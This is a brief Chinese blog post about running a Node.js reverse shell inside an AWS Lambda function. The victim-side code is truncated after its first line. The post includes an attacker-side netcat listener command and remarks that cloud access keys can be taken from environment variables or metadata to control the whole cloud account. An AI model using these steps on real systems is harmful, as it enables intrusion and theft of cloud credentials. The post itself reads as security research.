Nov 19, 2019
0x00 前言
原本在测AWS Lambda,后来变成研究Node.js反弹shell了,hhh。
0x01 被攻击端
直接套到lambda函数里就行了
1 |
(function(){ |
0x02 攻击端
1 |
nc -lvnp 8820 |
0x03 后记
这就就是云服务接管比直接的服务器被控的危害更大,就是可以在环境变量或者元数据中拿AKSK,然后权限配置不当的话,可以直接控了整个云账号了。
0x04 参考链接
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论